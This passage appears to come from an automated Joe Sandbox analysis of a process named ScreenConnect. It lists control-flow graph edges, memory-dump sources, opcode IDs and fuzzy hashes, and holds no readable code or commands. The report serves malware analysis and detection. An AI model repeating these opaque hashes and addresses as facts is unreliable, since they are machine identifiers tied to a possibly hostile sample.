7ff886d60830-7ff886d60832 848->852 855 7ff886d60845-7ff886d60862 851->855 852->855 862 7ff886d60868-7ff886d60876 call 7ff886d60100 855->862 863 7ff886d60864-7ff886d60866 855->863 856->857 860 7ff886d607e7-7ff886d607fa 857->860 861 7ff886d607d2-7ff886d607e5 call 7ff886d60100 857->861 860->833 861->833 861->860 865 7ff886d60879-7ff886d60896 862->865 863->865 870 7ff886d6089c-7ff886d608aa call 7ff886d60100 865->870 871 7ff886d60898-7ff886d6089a 865->871 873 7ff886d608ad-7ff886d608b6 870->873 871->873 873->847
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cd3031d36e50b3132c469eca26df10ac0715d8662808f7d6c77c8828effa2b76
                                                                  • Instruction ID: 19c373db5de7cb7dcdb1493661a33571c864e4737a259165eb1df681e15fd296
                                                                  • Opcode Fuzzy Hash: cd3031d36e50b3132c469eca26df10ac0715d8662808f7d6c77c8828effa2b76
                                                                  • Instruction Fuzzy Hash: 8012E271A0CA4A4FE799E66C94956B537D1FF98390F0440BAE48FCB293DD1ABC46C390

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2684033326.00007FF886A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886a50000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: MitigationPolicyProcess
                                                                  • String ID:
                                                                  • API String ID: 1088084561-0
                                                                  • Opcode ID: c6364707aba62adbfd6da5234b9248425dc67427aec72d32380084c1a25ef9df
                                                                  • Instruction ID: 035605d4a080fa67f27cd8d6d4c7bad2acce67421a7bbecc0e892b370e6c9708
                                                                  • Opcode Fuzzy Hash: c6364707aba62adbfd6da5234b9248425dc67427aec72d32380084c1a25ef9df
                                                                  • Instruction Fuzzy Hash: 7051373180D7894FD7169BB89C4A5E97FF1EF16361F0401BBE089C7193DE68A84AC792

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2684033326.00007FF886A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886a50000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: MitigationPolicyProcess
                                                                  • String ID:
                                                                  • API String ID: 1088084561-0
                                                                  • Opcode ID: 88e6d98d25ccc763668a5ab6bf042cfe66b111af517107c310f97598c050b12c
                                                                  • Instruction ID: c287bd6ab9665e08453c39623feef621ba135414af6da3a413b0189a63fd5383
                                                                  • Opcode Fuzzy Hash: 88e6d98d25ccc763668a5ab6bf042cfe66b111af517107c310f97598c050b12c
                                                                  • Instruction Fuzzy Hash: 1831E93090C7584FD7159BA89C4A6E9BFF0EF16721F04026FD095D7162DB74A845C792

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1052 7ff886d64e25-7ff886d64e31 1053 7ff886d64e35-7ff886d64e51 1052->1053 1054 7ff886d64e33 1052->1054 1056 7ff886d64e58-7ff886d64e5a 1053->1056 1054->1053 1055 7ff886d64e75-7ff886d64e7b 1054->1055 1057 7ff886d64e7d-7ff886d64e92 1055->1057 1058 7ff886d64e94-7ff886d64ea9 1055->1058 1059 7ff886d64ee9-7ff886d64ef2 1056->1059 1060 7ff886d64e60-7ff886d64e70 1056->1060 1057->1058 1063 7ff886d64eab-7ff886d64ee6 1058->1063 1064 7ff886d64ef3-7ff886d64f32 1058->1064 1060->1055 1063->1059 1070 7ff886d64f7c-7ff886d64f7f 1064->1070 1071 7ff886d64f34-7ff886d64f4b 1064->1071 1072 7ff886d64ffb 1070->1072 1073 7ff886d64f81 1070->1073 1080 7ff886d65168-7ff886d6517a 1071->1080 1081 7ff886d64f51-7ff886d64f57 1071->1081 1076 7ff886d64ffc-7ff886d65006 1072->1076 1077 7ff886d64fc7-7ff886d64fd4 1073->1077 1078 7ff886d64f83-7ff886d64f8b 1073->1078 1096 7ff886d65008 1076->1096 1083 7ff886d64fd7-7ff886d64fea 1077->1083 1078->1076 1082 7ff886d64f8d-7ff886d64f8f 1078->1082 1081->1080 1084 7ff886d64f5d-7ff886d64f63 1081->1084 1086 7ff886d6500b-7ff886d65014 1082->1086 1087 7ff886d64f91 1082->1087 1090 7ff886d64fec-7ff886d64ffa 1083->1090 1084->1080 1089 7ff886d64f69-7ff886d64f6f 1084->1089 1093 7ff886d65016-7ff886d6501a 1086->1093 1087->1083 1092 7ff886d64f93-7ff886d64f97 1087->1092 1089->1080 1091 7ff886d64f75-7ff886d64f7b 1089->1091 1090->1072 1091->1070 1091->1090 1095 7ff886d64f99-7ff886d64f9e 1092->1095 1092->1096 1097 7ff886d6501f-7ff886d65028 1093->1097 1095->1097 1098 7ff886d64fa0-7ff886d64fa5 1095->1098 1096->1086 1100 7ff886d6502d-7ff886d65048 1097->1100 1098->1093 1099 7ff886d64fa7-7ff886d64fac 1098->1099 1099->1100 1101 7ff886d64fae-7ff886d64fc2 1099->1101 1100->1080 1105 7ff886d6504e-7ff886d65054 1100->1105 1101->1077 1101->1080 1105->1080 1106 7ff886d6505a-7ff886d65060 1105->1106 1106->1080 1107 7ff886d65066-7ff886d6506c 1106->1107 1107->1080 1108 7ff886d65072-7ff886d650f2 1107->1108 1108->1080 1116 7ff886d650f4-7ff886d65109 call 7ff886d63e58 1108->1116 1119 7ff886d6510e-7ff886d65110 1116->1119 1119->1080 1120 7ff886d65112-7ff886d6512e call 7ff886d63e58 1119->1120 1120->1080 1124 7ff886d65130-7ff886d65138 1120->1124 1124->1080 1125 7ff886d6513a-7ff886d65167 call 7ff886d63e58 1124->1125
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0bdeb58457cd863767ec82f0d2ecd036b06f4118e9b1a8fba095010fe41992d9
                                                                  • Instruction ID: 5af0a5c0ea9fbd146a55dea2c74343378aa7ad0b52bc1186848b17acd6426664
                                                                  • Opcode Fuzzy Hash: 0bdeb58457cd863767ec82f0d2ecd036b06f4118e9b1a8fba095010fe41992d9
                                                                  • Instruction Fuzzy Hash: 50C1F33290CA4A5BEB59EA2894528B633E1FF51790B044179E44FC75C7EE29FC4AC7C1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1129 7ff886d65ef4-7ff886d65ef9 1130 7ff886d65eff-7ff886d65f1e 1129->1130 1131 7ff886d65fc0-7ff886d65fc7 1129->1131 1139 7ff886d65f6a-7ff886d65f7e 1130->1139 1140 7ff886d65f20-7ff886d65f3d 1130->1140 1132 7ff886d65fcd-7ff886d65fd4 1131->1132 1133 7ff886d66057-7ff886d6605e 1131->1133 1132->1133 1134 7ff886d65fda-7ff886d65fe4 1132->1134 1135 7ff886d66069-7ff886d6607c 1133->1135 1136 7ff886d66060-7ff886d66067 1133->1136 1138 7ff886d660a6-7ff886d660ad 1134->1138 1154 7ff886d65fea-7ff886d6601f 1134->1154 1155 7ff886d6608d-7ff886d66095 1135->1155 1156 7ff886d6607e-7ff886d66083 1135->1156 1136->1135 1136->1138 1142 7ff886d66311-7ff886d66318 1138->1142 1143 7ff886d660b3-7ff886d660ba 1138->1143 1152 7ff886d65fb0-7ff886d65fb1 1139->1152 1153 7ff886d65f80-7ff886d65f8a 1139->1153 1147 7ff886d66ad4-7ff886d66adc 1140->1147 1148 7ff886d65f43-7ff886d65f68 1140->1148 1150 7ff886d66aae-7ff886d66ac1 1142->1150 1151 7ff886d6631e-7ff886d66325 1142->1151 1143->1142 1149 7ff886d660c0-7ff886d660c3 1143->1149 1174 7ff886d66add-7ff886d66aee 1147->1174 1148->1139 1157 7ff886d660cc-7ff886d660da 1149->1157 1158 7ff886d660c5-7ff886d660c7 1149->1158 1151->1150 1159 7ff886d6632b-7ff886d6633d 1151->1159 1166 7ff886d65fb8-7ff886d65fb9 1152->1166 1160 7ff886d65f8c-7ff886d65f96 call 7ff886d654f0 1153->1160 1161 7ff886d65f98-7ff886d65fa2 1153->1161 1154->1147 1163 7ff886d6609b-7ff886d6609f 1155->1163 1164 7ff886d66b01-7ff886d66bd6 1155->1164 1156->1155 1185 7ff886d660dc 1157->1185 1186 7ff886d660de 1157->1186 1167 7ff886d6617a-7ff886d6617d 1158->1167 1168 7ff886d6633f-7ff886d6634a 1159->1168 1169 7ff886d66389-7ff886d6639c 1159->1169 1160->1152 1160->1161 1161->1166 1172 7ff886d65fa4-7ff886d65fae call 7ff886d63e38 1161->1172 1163->1138 1284 7ff886d66bdd-7ff886d66c08 1164->1284 1166->1131 1178 7ff886d6617f-7ff886d66181 1167->1178 1179 7ff886d66186-7ff886d66194 1167->1179 1188 7ff886d6630d 1168->1188 1189 7ff886d6634c-7ff886d6635c 1168->1189 1192 7ff886d663a3-7ff886d663ae 1169->1192 1172->1152 1172->1166 1198 7ff886d66aef-7ff886d66b00 1174->1198 1187 7ff886d66235-7ff886d6623b 1178->1187 1207 7ff886d66198 1179->1207 1208 7ff886d66196 1179->1208 1196 7ff886d660e0-7ff886d660e3 1185->1196 1186->1196 1194 7ff886d662ed-7ff886d662ef 1187->1194 1195 7ff886d66241-7ff886d66243 1187->1195 1188->1142 1189->1198 1199 7ff886d66362-7ff886d66387 1189->1199 1202 7ff886d663b4-7ff886d663cc 1192->1202 1203 7ff886d66451-7ff886d66457 1192->1203 1194->1142 1201 7ff886d662f1-7ff886d662f9 1194->1201 1195->1194 1204 7ff886d66249-7ff886d6627d 1195->1204 1205 7ff886d660ed-7ff886d660f8 1196->1205 1206 7ff886d660e5-7ff886d660eb 1196->1206 1198->1164 1199->1169 1201->1142 1209 7ff886d662fb-7ff886d6630b 1201->1209 1202->1203 1234 7ff886d663d2-7ff886d66445 1202->1234 1203->1150 1210 7ff886d6645d-7ff886d66465 1203->1210 1204->1194 1215 7ff886d660fa-7ff886d66117 1205->1215 1216 7ff886d66144-7ff886d66165 1205->1216 1214 7ff886d66168-7ff886d66178 1206->1214 1217 7ff886d6619a-7ff886d6619d 1207->1217 1208->1217 1209->1188 1223 7ff886d664ad-7ff886d664b5 1210->1223 1224 7ff886d66467-7ff886d664a6 1210->1224 1214->1167 1215->1174 1237 7ff886d6611d-7ff886d66142 1215->1237 1216->1214 1219 7ff886d6619f-7ff886d661a5 1217->1219 1220 7ff886d661a7-7ff886d661b2 1217->1220 1230 7ff886d66223-7ff886d66233 1219->1230 1231 7ff886d661fe-7ff886d66220 1220->1231 1232 7ff886d661b4-7ff886d661c0 1220->1232 1223->1150 1236 7ff886d664bb-7ff886d66534 1223->1236 1224->1223 1230->1187 1231->1230 1234->1203 1268 7ff886d6653a-7ff886d6667c 1236->1268 1269 7ff886d66aa1-7ff886d66aa8 1236->1269 1237->1216 1321 7ff886d66683-7ff886d6671a 1268->1321 1269->1150 1269->1236 1290 7ff886d66c0a-7ff886d66c1b 1284->1290 1291 7ff886d66bd3-7ff886d66bd6 1284->1291 1294 7ff886d66c1d-7ff886d66c97 1290->1294 1295 7ff886d66c15-7ff886d66c1b 1290->1295 1291->1284 1316 7ff886d66c99-7ff886d66cc0 1294->1316 1295->1294 1295->1295 1320 7ff886d66cc2-7ff886d66ce3 1316->1320 1330 7ff886d66ce8-7ff886d66d11 1320->1330 1328 7ff886d6671c-7ff886d6671e 1321->1328 1329 7ff886d66720-7ff886d66721 1321->1329 1331 7ff886d66728-7ff886d66735 1328->1331 1329->1331 1346 7ff886d66d13-7ff886d66da3 1330->1346 1332 7ff886d6676b 1331->1332 1333 7ff886d66737-7ff886d6674f 1331->1333 1335 7ff886d6676f-7ff886d66772 1332->1335 1343 7ff886d6676d 1333->1343 1344 7ff886d66751-7ff886d66766 1333->1344 1336 7ff886d66785-7ff886d66788 1335->1336 1337 7ff886d66774-7ff886d66781 1335->1337 1341 7ff886d6678a-7ff886d6678b 1336->1341 1342 7ff886d66792-7ff886d667bb 1336->1342 1337->1336 1347 7ff886d66783 1337->1347 1341->1342 1358 7ff886d667c2-7ff886d66859 1342->1358 1343->1335 1344->1321 1347->1336 1364 7ff886d6685f-7ff886d66860 1358->1364 1365 7ff886d6685b-7ff886d6685d 1358->1365 1367 7ff886d66867-7ff886d66874 1364->1367 1365->1367 1368 7ff886d668aa 1367->1368 1369 7ff886d66876-7ff886d6688e 1367->1369 1371 7ff886d668ae-7ff886d668b1 1368->1371 1378 7ff886d668ac 1369->1378 1379 7ff886d66890-7ff886d668a5 1369->1379 1373 7ff886d668c4-7ff886d668c7 1371->1373 1374 7ff886d668b3-7ff886d668c0 1371->1374 1375 7ff886d668c9-7ff886d668ca 1373->1375 1376 7ff886d668d1-7ff886d66924 call 7ff886d65338 1373->1376 1374->1373 1381 7ff886d668c2 1374->1381 1375->1376 1376->1269 1378->1371 1379->1358 1381->1373
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dc28e4af3747a190e6fc3dd50e0901f81f4a03a1ba7a93c9c6bd32398c8f056e
                                                                  • Instruction ID: cb7d29d077bacfbfc8c6d445ae4d6fd96fcc41398f85e6908cf1d4df763684c2
                                                                  • Opcode Fuzzy Hash: dc28e4af3747a190e6fc3dd50e0901f81f4a03a1ba7a93c9c6bd32398c8f056e
                                                                  • Instruction Fuzzy Hash: 08C16F62D0C9D20BFB45A6BCA8656F42791EF51BA8F094276E48FCE0D3ED0D7C458683
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 977e8b964450679cc72782097f7a98910a2ef0d27d33c8b5a31d09ff66eca544
                                                                  • Instruction ID: e00bf1a9652174151babc233a6b6d8a10b3dd33a8bcd12f1f10edeeae43c2d74
                                                                  • Opcode Fuzzy Hash: 977e8b964450679cc72782097f7a98910a2ef0d27d33c8b5a31d09ff66eca544
                                                                  • Instruction Fuzzy Hash: 15713C32B1CB1A4BEBAC596CA48617573D1FB99761B00427EE58BC7246FD27BC4382C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee72fe4635b06d29b1326339ad34b87e756acace3a477290146fdd723afd371c
                                                                  • Instruction ID: 7f2a5dce98ae2fb3233e3c18042f62b0e36c3fa0e6ef6d39260020eb64aa4a68
                                                                  • Opcode Fuzzy Hash: ee72fe4635b06d29b1326339ad34b87e756acace3a477290146fdd723afd371c
                                                                  • Instruction Fuzzy Hash: 4B813B33E0CA864FEB55966CA8661E57BD0FFA9260B0911B7E08EC7193DE157C06C7C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b0b00e20d20d3fb688610401d57a76d47760ed61df31e8d3fbfaa3623ee2ebdd
                                                                  • Instruction ID: e6f6e857130398c14de8df27a9ca56e01f1d5008680d77c5a56f3f9c0759fb80
                                                                  • Opcode Fuzzy Hash: b0b00e20d20d3fb688610401d57a76d47760ed61df31e8d3fbfaa3623ee2ebdd
                                                                  • Instruction Fuzzy Hash: C371AB72D1DA8A4FE796973898655B53BE1FF92690B0804FAD04ECB1C3DE1A7C46C381
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c9bf2cd33f78f2137806ea6194da3e74a67476b2ebe9cda97e06cc5b4cfb942
                                                                  • Instruction ID: b4b061b5214bca9b1e219a3ffffea99db1308db3694643ba77c161870662bf20
                                                                  • Opcode Fuzzy Hash: 3c9bf2cd33f78f2137806ea6194da3e74a67476b2ebe9cda97e06cc5b4cfb942
                                                                  • Instruction Fuzzy Hash: F5711E70A28A0A8FEBA8EB58C591BA533D1FF58341F504078E54FC7292DE6AFC45C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c01c81dd906c47857d32dc93799f449a9eb826e4b620093342b701c1d38e4bc
                                                                  • Instruction ID: 17babfb1629df7a7821dbc14eec79a763227e7397ae276b812d1a2bddeb42dd0
                                                                  • Opcode Fuzzy Hash: 4c01c81dd906c47857d32dc93799f449a9eb826e4b620093342b701c1d38e4bc
                                                                  • Instruction Fuzzy Hash: 0A619172E0CA498FDB89EE289896AA577D1FF64750F0440B9D44ECB296DE35FC06C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ea8c75f19ca94081dfefc0afca1a55dc41229dc9ed02991e2491c5fd3010254e
                                                                  • Instruction ID: 50abccbf37bbc5680e094c9ec3f8eedecaabaeafb12a119310f8f386854219d8
                                                                  • Opcode Fuzzy Hash: ea8c75f19ca94081dfefc0afca1a55dc41229dc9ed02991e2491c5fd3010254e
                                                                  • Instruction Fuzzy Hash: 29513532D0DE498BE765DA68A8551E97BE1FF98350F0441B9E04ECB1D2EF29BC06C391
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee32ceb229160785864cd867f04d1eca30cbe5a537bd0f8f8a849c29a76a4e75
                                                                  • Instruction ID: 1e867b6c024ce527d665f0fdd24654d7b2ef73befdc97fdda424a6613f0cf565
                                                                  • Opcode Fuzzy Hash: ee32ceb229160785864cd867f04d1eca30cbe5a537bd0f8f8a849c29a76a4e75
                                                                  • Instruction Fuzzy Hash: 57517370A08A498FDF84DF18C894A6537E1FF69354B1446B9E41ACB2D6DB36FC42CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 09625ce839827a2184c9f6925703b4c0705b5bc83668c6a10723c166292be219
                                                                  • Instruction ID: fe0a6851681e06ec197df062385d9dc66d9a073d68459cb183d2ba72be765a6d
                                                                  • Opcode Fuzzy Hash: 09625ce839827a2184c9f6925703b4c0705b5bc83668c6a10723c166292be219
                                                                  • Instruction Fuzzy Hash: 33411430D1CA8A4BD7599A688465AB437D1FF54B84F1441BEE40FCB2C7DE29BC05C782
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f8325d56c959283d2216461be1e8e37237e0e542935354eeed86d53c14b4184
                                                                  • Instruction ID: 0c2b07a5b98c45ff1ddd9af465f43fdc5b5ac6105e4f1f4df8ff03e66c295aeb
                                                                  • Opcode Fuzzy Hash: 2f8325d56c959283d2216461be1e8e37237e0e542935354eeed86d53c14b4184
                                                                  • Instruction Fuzzy Hash: C7413F71A18A4A8FDB89DF28C8A4A6537E1FF58318B1405ADE41FC72D2CB35EC52CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4c884aabfdb920aed055f08b34893eb6f02dfc8bfac5e995fac00630cb5ecb4
                                                                  • Instruction ID: 5d060d2d533c970cbf930441e08daa672ed893f1cb069367582d33f9a42ee1a0
                                                                  • Opcode Fuzzy Hash: f4c884aabfdb920aed055f08b34893eb6f02dfc8bfac5e995fac00630cb5ecb4
                                                                  • Instruction Fuzzy Hash: 35412A37D0D6925FE702EAACECA55E57B50FF6226470901B3D1C99F093ED0A3846C6D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c4e5f6e96c4f28c445d5cf299e1d7a49d3ce920eb2bf9076aa56d4b2d0dbe30d
                                                                  • Instruction ID: 6a5bd38769f4b8e1d122a22fc09c171425cca52a6fe10c02f25662c06ffe8bca
                                                                  • Opcode Fuzzy Hash: c4e5f6e96c4f28c445d5cf299e1d7a49d3ce920eb2bf9076aa56d4b2d0dbe30d
                                                                  • Instruction Fuzzy Hash: 69312837D0D5925FE712EAACECA54E57B60FF6226470901B3D0C99B093ED0A3846C6D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 33b159bc62245a9e53317d658f70ab576c8032f39142889be0ce98582512ee92
                                                                  • Instruction ID: 1dd5d84cf022fe2e4b8880df0b95e5161eb75746b677a62e7088483181d26675
                                                                  • Opcode Fuzzy Hash: 33b159bc62245a9e53317d658f70ab576c8032f39142889be0ce98582512ee92
                                                                  • Instruction Fuzzy Hash: B031F16280EA970FD725E6344D574A47BD0FF81291F4849BAE4CECB193E90E384AC3C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 777cc6d0f1b5ff98c5c9075b48078aef296ee13a62accf319fc16508904fde0f
                                                                  • Instruction ID: 68ce27faa8e8a51d3581f0914c68373d4de429429f74643a235dea0ab16def7f
                                                                  • Opcode Fuzzy Hash: 777cc6d0f1b5ff98c5c9075b48078aef296ee13a62accf319fc16508904fde0f
                                                                  • Instruction Fuzzy Hash: CD212972E28E4F4BEA99DA288054AB173E1FF94780B504578D40FCB2C6DE25BC45C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 32a8c94f992dbebe648fbe23d253f66399c722224ce0b3304adfbb8d5e144369
                                                                  • Instruction ID: 72f7dc3607a1742795e81e9b62de63c3e4c373b39c99c067bce6d0bc9e5d3f09
                                                                  • Opcode Fuzzy Hash: 32a8c94f992dbebe648fbe23d253f66399c722224ce0b3304adfbb8d5e144369
                                                                  • Instruction Fuzzy Hash: 06118171D0CB49CFDB96DB645C650A97BE0FF55344F0580AAE05AD32D2DB25A841CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8ca2d7c7675a13751edb89832eadcc1872db1239ade56bc19d1cb66b89abb641
                                                                  • Instruction ID: bb106f154fc781c268e0a437b2912c4e76797bb1076763b59ced97a67d623a80
                                                                  • Opcode Fuzzy Hash: 8ca2d7c7675a13751edb89832eadcc1872db1239ade56bc19d1cb66b89abb641
                                                                  • Instruction Fuzzy Hash: 1D111971A08A468FDA88EF18C456B6577A1FF58744F0840B8D44EDB2A7DF39EC46C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f258abd9f4e7c02c524a34a95fbf5953f256459e23f7aa0e9f2fc3b7cd6011ef
                                                                  • Instruction ID: 272a42f12d93811a36197b30d21bf260e78b9e9c2dc2b576cced421b51985e4e
                                                                  • Opcode Fuzzy Hash: f258abd9f4e7c02c524a34a95fbf5953f256459e23f7aa0e9f2fc3b7cd6011ef
                                                                  • Instruction Fuzzy Hash: EA11E971A089468FDA88EF18C456B6577A1FF59744F0840B8D44EDB297DE39EC46C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b98c3b512e59e71c5d1b462957a1c955d939057afb17fd969d189c4442ddc86
                                                                  • Instruction ID: 7115b8ab9689f2c267a9c4f586b9f332534849ae9817c6fc2b159cb7a388465a
                                                                  • Opcode Fuzzy Hash: 2b98c3b512e59e71c5d1b462957a1c955d939057afb17fd969d189c4442ddc86
                                                                  • Instruction Fuzzy Hash: 5D016225E1C9574AF7A8A229909537952D2FF98391F14C079E40FC32E6DE6DFC85C2C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
